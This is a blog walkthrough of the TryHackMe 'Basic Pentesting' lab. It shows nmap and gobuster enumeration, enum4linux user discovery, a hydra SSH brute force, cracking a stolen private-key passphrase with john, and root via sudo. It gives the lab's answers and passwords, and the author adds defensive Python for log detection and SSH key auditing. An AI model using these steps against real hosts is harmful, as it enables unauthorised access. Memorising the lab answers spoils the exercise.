Basic Pentesting

shadowmaster
9 min read · Jul 9, 2021

This is a machine that lets you practise web app hacking and privilege escalation.

Task 1 : Web App Testing and Privilege Escalation

In this set of tasks you will learn the following:

  • brute forcing
  • hash cracking
  • service enumeration
  • Linux Enumeration

The main goal here is to learn as much as possible. Make sure you are connected to our network using your OpenVPN configuration file.
Credits to Josiah Pierce from Vulnhub.

Q. Deploy the machine and connect to our network
Ans : No Answer Needed

Explained

Start the machine and connect to the TryHackMe network using OpenVPN, or use the AttackBox.

Q. Find the services exposed by the machine
Ans : No Answer Needed

Explained

(hint) use an nmap scan to look for the open ports
Scan using nmap:

  • nmap -sS 10.10.68.15 (-sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans)
  • nmap -A 10.10.68.15 (-A: enable OS detection, version detection, script scanning, and traceroute)
  • nmap -p- 10.10.68.15 (-p <port ranges>: only scan the specified ports; -p- scans all 65535 ports)
  • nmap -T4 10.10.68.15 (-T<0-5>: set timing template; higher is faster)

Q. What is the name of the hidden directory on the web server(enter name without /)?
(hint: use dirsearch/dirbuster to find the hidden directories.)
Ans: development

Explained

The hidden directory can be found by two methods.

Method 1

Use nmap with the http-enum script:

┌──(root💀kali)-[/home/blackhat]
└─# nmap -p80 --script http-enum 10.10.68.15
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-09 07:44 IST
Nmap scan report for 10.10.68.15
Host is up (0.19s latency).

PORT   STATE SERVICE
80/tcp open  http
| http-enum:
|_  /development/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)'

Nmap done: 1 IP address (1 host up) scanned in 20.39 seconds
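The scan output above is read by eye, but the same format is easy to parse when you scan many hosts or want to alert on a finding such as a directory listing. The following Python parser is an added example, not code from the original write-up: it turns nmap's normal output (the PORT/STATE/SERVICE table plus the NSE script lines indented under each port) into a dict and then extracts the open ports and any http-enum hit that mentions a listing. The sample output is constructed: the 80/tcp line and its http-enum result are the page's, while the 22/tcp and 445/tcp lines are assumptions added so the parser has several ports to work on.

```python
"""Parser for nmap's normal (-oN style) output: added example, not part of the post."""
import re

# Constructed sample in the shape of the page's scan. Only the 80/tcp line and
# its http-enum result are from the walkthrough; 22/tcp and 445/tcp are assumed.
SAMPLE_NMAP = """\
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-09 07:44 IST
Nmap scan report for 10.10.68.15
Host is up (0.19s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
| http-enum:
|_  /development/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)'
445/tcp open  netbios-ssn

Nmap done: 1 IP address (1 host up) scanned in 20.39 seconds
"""

HOST_RE = re.compile(r'^Nmap scan report for (?P<host>\S+)')
PORT_RE = re.compile(r'^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)')
# "| http-enum:" or "|_http-title: ..." opens a script block. Script names never
# contain '/', so a path line such as "|_  /development/: ..." is not mistaken for one.
SCRIPT_START_RE = re.compile(r'^\|[_ ]\s*(?P<name>[\w-]+):\s*(?P<rest>.*)$')
SCRIPT_LINE_RE = re.compile(r'^\|[_ ]\s*(?P<text>.*)$')


def parse_nmap(text):
    """Return {'host': ..., 'ports': {'80/tcp': {'state', 'service', 'scripts'}}}."""
    report = {'host': None, 'ports': {}}
    current = None   # port entry that following script lines belong to
    script = None    # name of the script block being collected
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            report['host'] = m['host']
            continue
        m = PORT_RE.match(line)
        if m:
            current = {'state': m['state'], 'service': m['service'], 'scripts': {}}
            report['ports'][f"{m['port']}/{m['proto']}"] = current
            script = None
            continue
        if current is None:
            continue                      # banner lines before the port table
        m = SCRIPT_START_RE.match(line)
        if m:
            script = m['name']
            current['scripts'][script] = [m['rest']] if m['rest'] else []
            continue
        m = SCRIPT_LINE_RE.match(line)
        if m and script is not None:
            current['scripts'][script].append(m['text'])
    return report


def open_ports(report):
    """Open ports as 'port/proto' strings, sorted numerically."""
    return sorted((k for k, v in report['ports'].items() if v['state'] == 'open'),
                  key=lambda k: int(k.split('/')[0]))


def listable_directories(report):
    """Paths that http-enum reported with a directory listing enabled."""
    hits = []
    for entry in report['ports'].values():
        for text in entry['scripts'].get('http-enum', []):
            if 'listing' in text:
                hits.append(text.split(':', 1)[0])
    return hits


if __name__ == '__main__':
    r = parse_nmap(SAMPLE_NMAP)
    print(r['host'], open_ports(r))
    print('directory listings:', listable_directories(r))
```

The `listable_directories` check is the kind of rule a defender would run over scheduled scans of their own hosts: an Apache directory listing on a web root is a misconfiguration (`Options -Indexes` turns it off), and here it is what exposes the development folder.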

Method 2

Use gobuster to find directories and files on the web site:

┌──(root💀kali)-[/home/blackhat]
└─# gobuster dir -u http://10.10.68.15/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.68.15/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/06/09 07:52:01 Starting gobuster in directory enumeration mode
===============================================================
/development          (Status: 301) [Size: 316] [--> http://10.10.68.15/development/]
Progress: 705 / 220561 (0.32%)

Q. Use brute-forcing to find the username & password.
Ans: No Ans Needed

Explained

Here we use the command enum4linux -a 10.10.155.54 to enumerate users over SMB (-a runs all of the simple enumeration checks):

┌──(root💀kali)-[/home/blackhat]
└─# enum4linux -a 10.10.155.54

Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Jul  4 05:38:35 2021

 ==========================
|    Target Information    |
 ==========================
Target ........... 10.10.155.54
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

 ==================================================================
|    Users on 10.10.155.54 via RID cycling (RIDS: 500-550,1000-1050
 ==================================================================

[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-2853212168-2008227510-3551253869
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-22-1 and logon username '', pas
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)

[+] Enumerating users using SID S-1-5-32 and logon username '', pas
S-1-5-32-500 *unknown*\*unknown* (8)
S-1-5-32-501 *unknown*\*unknown* (8)
S-1-5-32-502 *unknown*\*unknown* (8)
S-1-5-32-503 *unknown*\*unknown* (8)
S-1-5-32-504 *unknown*\*unknown* (8)
S-1-5-32-505 *unknown*\*unknown* (8)
S-1-5-32-506 *unknown*\*unknown* (8)
^CS-1-5-32-507 *unknown*\*unknown* (8)

Q. What is the username?
Ans: jan

[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-2853212168-2008227510-3551253869
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-22-1 and logon username '', pas
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)

Q. What is the password?
Ans: armando

Explained

Here we use hydra. -l gives the single username to try, -P the password list, and -t 4 limits hydra to four parallel connections, which SSH servers tolerate better than the default:

hydra -l jan -P /directory_path/rockyou.txt ssh://ip -t 4

Run the command above against the target.

┌──(root💀kali)-[/home/blackhat]
└─# hydra -l jan -P /home/blackhat/Desktop/rockyou.txt ssh://10.10.178.171 -t 4
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-07-10 01:03:23
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344398 login tries (l:1/p:14344398), ~3586100 tries per task
[DATA] attacking ssh://10.10.178.171:22/
[STATUS] 41.00 tries/min, 41 tries in 00:01h, 14344357 to do in 5831:03h, 4 active
[STATUS] 28.00 tries/min, 84 tries in 00:03h, 14344314 to do in 8538:17h, 4 active
[STATUS] 29.00 tries/min, 203 tries in 00:07h, 14344195 to do in 8243:48h, 4 active
[STATUS] 27.07 tries/min, 406 tries in 00:15h, 14343992 to do in 8832:31h, 4 active
[22][ssh] host: 10.10.178.171   login: jan   password: armando
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-07-10 01:32:36
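Both the gobuster run earlier and this hydra run leave the same footprint on the target: one client address producing many failures in a short time (404s in the Apache access log, "Failed password" lines in sshd's auth.log). The script below is an added example, not part of the original write-up. It feeds both log types through one sliding-window counter and reports the sources that exceed a threshold. The log lines are constructed samples rather than captured traffic, and the thresholds, window sizes, hostnames and client addresses are assumptions chosen for the demonstration.

```python
"""Sliding-window burst detection over web and SSH logs (added example)."""
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed Apache combined-log lines: 10.0.0.9 walks a wordlist the way a
# directory scanner does, 10.0.0.7 is an ordinary visitor. Not real traffic.
ACCESS_LOG = """\
10.0.0.7 - - [09/Jun/2021:07:52:01 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
10.0.0.9 - - [09/Jun/2021:07:52:01 +0000] "GET /admin HTTP/1.1" 404 275 "-" "gobuster/3.1.0"
10.0.0.9 - - [09/Jun/2021:07:52:01 +0000] "GET /backup HTTP/1.1" 404 275 "-" "gobuster/3.1.0"
10.0.0.9 - - [09/Jun/2021:07:52:02 +0000] "GET /test HTTP/1.1" 404 275 "-" "gobuster/3.1.0"
10.0.0.9 - - [09/Jun/2021:07:52:02 +0000] "GET /development HTTP/1.1" 301 316 "-" "gobuster/3.1.0"
10.0.0.9 - - [09/Jun/2021:07:52:03 +0000] "GET /old HTTP/1.1" 404 275 "-" "gobuster/3.1.0"
10.0.0.9 - - [09/Jun/2021:07:52:03 +0000] "GET /tmp HTTP/1.1" 404 275 "-" "gobuster/3.1.0"
10.0.0.7 - - [09/Jun/2021:07:55:10 +0000] "GET /missing.png HTTP/1.1" 404 275 "-" "Mozilla/5.0"
"""

# Constructed sshd auth.log lines: repeated failures from 10.0.0.9, one typo from 10.0.0.7.
AUTH_LOG = """\
Jul 10 01:03:30 basic2 sshd[1201]: Failed password for jan from 10.0.0.9 port 40110 ssh2
Jul 10 01:03:31 basic2 sshd[1203]: Failed password for jan from 10.0.0.9 port 40112 ssh2
Jul 10 01:03:33 basic2 sshd[1205]: Failed password for jan from 10.0.0.9 port 40114 ssh2
Jul 10 01:03:34 basic2 sshd[1207]: Failed password for invalid user admin from 10.0.0.9 port 40116 ssh2
Jul 10 01:03:36 basic2 sshd[1209]: Failed password for jan from 10.0.0.9 port 40118 ssh2
Jul 10 01:32:36 basic2 sshd[1300]: Accepted password for jan from 10.0.0.9 port 40900 ssh2
Jul 10 02:15:00 basic2 sshd[1401]: Failed password for jan from 10.0.0.7 port 51000 ssh2
"""

ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
AUTH_RE = re.compile(
    r'^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Failed password for '
    r'(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+)')


def parse_access_log(text):
    """Yield (timestamp, client ip, path) for every 404 in combined-log lines."""
    for line in text.splitlines():
        m = ACCESS_RE.match(line)
        if not m or m['status'] != '404':
            continue
        ts = datetime.strptime(m['ts'].split()[0], '%d/%b/%Y:%H:%M:%S')
        yield ts, m['ip'], m['path']


def parse_auth_log(text, year=2021):
    """Yield (timestamp, client ip, user) for every failed SSH password attempt.
    syslog timestamps carry no year, so the caller supplies one."""
    for line in text.splitlines():
        m = AUTH_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", '%Y %b %d %H:%M:%S')
        yield ts, m['ip'], m['user']


def find_bursts(events, threshold, window_seconds):
    """Return {ip: (count, [detail, ...])} for every source that produced at
    least `threshold` events inside a `window_seconds` sliding window.
    Events must arrive in time order, as they do in a log file."""
    recent = defaultdict(deque)
    flagged = {}
    for ts, ip, detail in events:
        q = recent[ip]
        q.append((ts, detail))
        while (ts - q[0][0]).total_seconds() > window_seconds:
            q.popleft()                      # drop events that fell out of the window
        if len(q) >= threshold:
            flagged[ip] = (len(q), [d for _, d in q])   # latest window over the limit
    return flagged


def web_scan_sources(log=ACCESS_LOG, threshold=5, window=10):
    """Clients with `threshold` or more 404s within `window` seconds."""
    return find_bursts(parse_access_log(log), threshold, window)


def ssh_bruteforce_sources(log=AUTH_LOG, threshold=5, window=60):
    """Clients with `threshold` or more failed SSH logins within `window` seconds."""
    return find_bursts(parse_auth_log(log), threshold, window)


if __name__ == '__main__':
    for ip, (n, paths) in web_scan_sources().items():
        print(f'web scan from {ip}: {n} misses, e.g. {paths[:3]}')
    for ip, (n, users) in ssh_bruteforce_sources().items():
        print(f'ssh guessing from {ip}: {n} failures against {sorted(set(users))}')
```

Note the asymmetry in the numbers: hydra's own status lines above show only about 30 tries per minute because sshd caps unauthenticated connections (`MaxStartups`) and retries per connection (`MaxAuthTries`), so a low threshold over a one-minute window is enough to see it, whereas the directory scan runs at hundreds of requests per second and needs a much shorter window.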

Q. What service do you use to access the server(answer in abbreviation in all caps)?
Ans: SSH

┌──(root💀kali)-[/home/blackhat/Desktop]
└─# ssh jan@10.10.160.185

The authenticity of host '10.10.160.185 (10.10.160.185)' can't be established.
ECDSA key fingerprint is SHA256:+Fk53V/LB+2pn4OPL7GN/DuVHVvO0lT9N4W5ifchySQ.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.160.185' (ECDSA) to the list of known hosts.
jan@10.10.160.185's password:
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

0 packages can be updated.
0 updates are security updates.

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
Last login: Mon Apr 23 15:55:45 2018 from 192.168.56.102
jan@basic2:~$

Q. Enumerate the machine to find any vectors for privilege escalation
Ans: No ans needed

hint: use a privilege escalation checklist or a tool like LinEnum

Q. What is the name of the other user you found(all lower case)?

Ans: Kay

Explained:

┌──(root💀kali)-[/home/blackhat]
└─# enum4linux -a 10.10.155.54

Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Jul  4 05:38:35 2021

 ==========================
|    Target Information    |
 ==========================
Target ........... 10.10.155.54
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

 ==================================================================
|    Users on 10.10.155.54 via RID cycling (RIDS: 500-550,1000-1050
 ==================================================================

[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-2853212168-2008227510-3551253869
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-22-1 and logon username '', pas
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)

Q. If you have found another user, what can you do with this information?
hint: apart from a password, how else can a user access a machine?

Ans: No ans needed

After getting the username and password, follow these steps.

Step 1: connect to the machine over SSH as jan:
ssh jan@<ip>

┌──(root💀kali)-[/home/blackhat]
└─# ssh jan@10.10.98.3

Are you sure you want to continue connecting (yes/no/[fingerprint])? y
Please type 'yes', 'no' or the fingerprint: yes
Warning: Permanently added '10.10.98.3' (ECDSA) to the list of known hosts.
jan@10.10.98.3's password:
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86_64)
Last login: Mon Apr 23 15:55:45 2018 from 192.168.56.102
jan@basic2:~$

Step 2: after logging in, run ls, then cd .. to /home, where you will find the directories jan and kay.

Note the commands used:

jan@basic2:~$
jan@basic2:~$
jan@basic2:~$ ls
jan@basic2:~$ cd ..
jan@basic2:/home$ ls
jan kay
jan@basic2:/home$ cd jan/
jan@basic2:~$ ls
jan@basic2:~$ cd ..
jan@basic2:/home$ cd kay/
jan@basic2:/home/kay$ ls
pass.bak
jan@basic2:/home/kay$ cat pass.bak
cat: pass.bak: Permission denied
jan@basic2:/home/kay$

Here we could not read pass.bak, so we list the directory with ls -al to see the permissions:
jan@basic2:/home/kay$ ls -al
total 48
drwxr-xr-x 5 kay  kay  4096 Apr 23  2018 .
drwxr-xr-x 4 root root 4096 Apr 19  2018 ..
-rw------- 1 kay  kay   756 Apr 23  2018 .bash_history
-rw-r--r-- 1 kay  kay   220 Apr 17  2018 .bash_logout
-rw-r--r-- 1 kay  kay  3771 Apr 17  2018 .bashrc
drwx------ 2 kay  kay  4096 Apr 17  2018 .cache
-rw------- 1 root kay   119 Apr 23  2018 .lesshst
drwxrwxr-x 2 kay  kay  4096 Apr 23  2018 .nano
-rw------- 1 kay  kay    57 Apr 23  2018 pass.bak
-rw-r--r-- 1 kay  kay   655 Apr 17  2018 .profile
drwxr-xr-x 2 kay  kay  4096 Apr 23  2018 .ssh
-rw-r--r-- 1 kay  kay     0 Apr 17  2018 .sudo_as_admin_successful
-rw------- 1 root kay   538 Apr 23  2018 .viminfo

Note the .ssh directory. pass.bak is mode -rw------- (readable by its owner only), which is why jan cannot read it. The .ssh directory, however, is drwxr-xr-x: others have read and execute permission on it, so jan can enter it, list it, and read any file inside that is itself world-readable. That is why we choose .ssh.

Result

jan@basic2:/home/kay$ cd .ssh
jan@basic2:/home/kay/.ssh$ ls
authorized_keys  id_rsa  id_rsa.pub

Use cat to view the key:

jan@basic2:/home/kay/.ssh$ cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,6ABA7DE35CDB65070B92C1F760E2FE75
[key body omitted]
-----END RSA PRIVATE KEY-----

Now save the key content to a file on the attacking machine, either with nano or by copying it directly.

Then let's use John the Ripper. First run the ssh2john tool to convert the encrypted key into a hash that John can crack:

python /usr/share/john/ssh2john.py key > key1.txt

┌──(root💀kali)-[/home/blackhat]
└─# python /usr/share/john/ssh2john.py key>key1.txt

Here my key file is named key, and the hash is written to key1.txt. Then run the next command.

Now run John the Ripper to crack the passphrase of Kay's key (the hash file is the one produced by ssh2john, key1.txt above):

john --wordlist=rockyou.txt sshkeyshash.txt

┌──(root💀kali)-[/home/blackhat]
└─# john --wordlist=rockyou.txt key1.txt

Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
beeswax          (key)
Warning: Only 1 candidate left, minimum 4 needed for performance.
1g 0:00:00:06 DONE (2021-07-10 07:47) 0.1605g/s 2302Kp/s 2302Kc/s 2302KC/s *7¡Vamos!
Session completed

Here beeswax is the passphrase of kay's private key. John's "Cost 1 ... is 0" line shows the key uses the legacy MD5/AES scheme with a single iteration, which is why the wordlist ran through in six seconds.
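Two separate weaknesses made this step possible: the .ssh directory and the key inside it were readable by other users, and the key was encrypted with the legacy PEM scheme (Proc-Type/DEK-Info headers, MD5 key derivation) and a dictionary passphrase. The audit below is an added example, not part of the original write-up. It checks a .ssh directory for both problems: permission bits that grant group or other access, and private keys that are unencrypted or use the legacy format (it reads the cipher name from the header of new-format keys, which record "none" when no passphrase is set). The demo lays out a throwaway home directory with constructed key files, assumed to mirror the listing above; no real key material is used.

```python
"""Audit ~/.ssh for world-readable or weakly protected private keys (added example)."""
import base64
import os
import shutil
import stat
import tempfile
from pathlib import Path

MAGIC = b'openssh-key-v1\x00'      # header of the new OpenSSH private-key format


def key_protection(text):
    """Classify how a private key is protected at rest.

    'legacy-pem-encrypted' : PEM with Proc-Type/DEK-Info headers; the passphrase
                             is stretched with one MD5 round, so it cracks fast.
    'openssh-encrypted'    : new format with a real cipher (bcrypt KDF).
    'plaintext'            : no passphrase at all.
    """
    if 'BEGIN OPENSSH PRIVATE KEY' in text:
        body = ''.join(l for l in text.splitlines() if not l.startswith('-----'))
        blob = base64.b64decode(body)
        if not blob.startswith(MAGIC):
            return 'unknown'
        n = int.from_bytes(blob[len(MAGIC):len(MAGIC) + 4], 'big')
        cipher = blob[len(MAGIC) + 4:len(MAGIC) + 4 + n].decode('ascii')
        return 'plaintext' if cipher == 'none' else 'openssh-encrypted'
    if 'Proc-Type: 4,ENCRYPTED' in text and 'DEK-Info:' in text:
        return 'legacy-pem-encrypted'
    if 'PRIVATE KEY' in text:
        return 'plaintext'
    return 'unknown'


def audit_ssh_dir(ssh_dir):
    """Return (name, issue) pairs for a .ssh directory and the private keys in it."""
    ssh_dir = Path(ssh_dir)
    issues = []
    if stat.S_IMODE(ssh_dir.stat().st_mode) & 0o077:
        issues.append(('.ssh', 'dir-mode'))          # others can list it; want 0700
    for p in sorted(ssh_dir.iterdir()):
        if not p.is_file():
            continue
        text = p.read_text(errors='replace')
        if 'PRIVATE KEY' not in text:
            continue                                  # .pub, known_hosts, config ...
        if stat.S_IMODE(p.stat().st_mode) & 0o077:
            issues.append((p.name, 'key-mode'))       # others can read it; want 0600
        prot = key_protection(text)
        if prot != 'openssh-encrypted':
            issues.append((p.name, prot))
    return issues


# Constructed fixtures: only the headers the audit reads are realistic.
LEGACY_PEM = """\
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF

(constructed placeholder, not key material)
-----END RSA PRIVATE KEY-----
"""


def fake_openssh_key(cipher):
    """Build a new-format stub whose header names `cipher` (constructed, no key inside)."""
    blob = MAGIC + len(cipher).to_bytes(4, 'big') + cipher.encode() + b'\x00' * 8
    b64 = base64.b64encode(blob).decode()
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{b64}\n-----END OPENSSH PRIVATE KEY-----\n"


def run_demo():
    """Lay out a throwaway home like kay's (drwxr-xr-x .ssh, world-readable legacy
    key) plus an unencrypted new-format key; audit it; remove it."""
    home = Path(tempfile.mkdtemp(prefix='kay-'))
    try:
        ssh = home / '.ssh'
        ssh.mkdir()
        os.chmod(ssh, 0o755)
        (ssh / 'id_rsa').write_text(LEGACY_PEM)
        os.chmod(ssh / 'id_rsa', 0o644)
        (ssh / 'id_rsa.pub').write_text('ssh-rsa AAAA(constructed) kay@basic2\n')
        (ssh / 'id_ed25519').write_text(fake_openssh_key('none'))
        os.chmod(ssh / 'id_ed25519', 0o600)
        return audit_ssh_dir(ssh)
    finally:
        shutil.rmtree(home)


if __name__ == '__main__':
    for name, issue in run_demo():
        print(f'{name}: {issue}')
```

The fixes for the findings are the usual ones: `chmod 700 ~/.ssh` and `chmod 600 ~/.ssh/id_rsa`, and `ssh-keygen -p -a 100 -f id_rsa` to re-encrypt a legacy key in the new format with a bcrypt-stretched passphrase (add `-o` on OpenSSH older than 7.8, where the legacy format was still the default).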

Now use the key to log in as kay with the command ssh -i /home/kay/.ssh/id_rsa kay@10.10.98.3, entering the cracked passphrase when prompted:

jan@basic2:/home/kay/.ssh$ ssh -i /home/kay/.ssh/id_rsa kay@10.10.98.3
Could not create directory '/home/jan/.ssh'.
The authenticity of host '10.10.98.3 (10.10.98.3)' can't be established.
ECDSA key fingerprint is SHA256:+Fk53V/LB+2pn4OPL7GN/DuVHVvO0lT9N4W5ifchySQ.
Are you sure you want to continue connecting (yes/no)? y
Please type 'yes' or 'no': yes
Failed to add the host to the list of known hosts (/home/jan/.ssh/known_hosts).
Enter passphrase for key '/home/kay/.ssh/id_rsa':
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

0 packages can be updated.
0 updates are security updates.

Last login: Mon Apr 23 16:04:07 2018 from 192.168.56.102
kay@basic2:~$

Q. What is the final password you obtain?
Ans: heresareallystrongpasswordthatfollowsthepasswordpolicy$$

Explained

kay@basic2:~$ ls
pass.bak
kay@basic2:~$ cat pass.bak
heresareallystrongpasswordthatfollowsthepasswordpolicy$$
kay@basic2:~$

We have finally got the password, and the challenge is complete.

Let's try to escalate privileges from kay's account. First check what sudo privileges kay has with the command:

command: sudo -l

The result shows kay has full sudo privileges, so we run sudo su to get a root shell.

Finally, read the flag with cat.

Yaahooo, we have completed Basic Pentesting.

Thanks to my guru
Sarath g

shadowmaster

Student Of Sarath G. I am a Cyber Security Trainer & Ethical Hacker. Thanks to My Guru.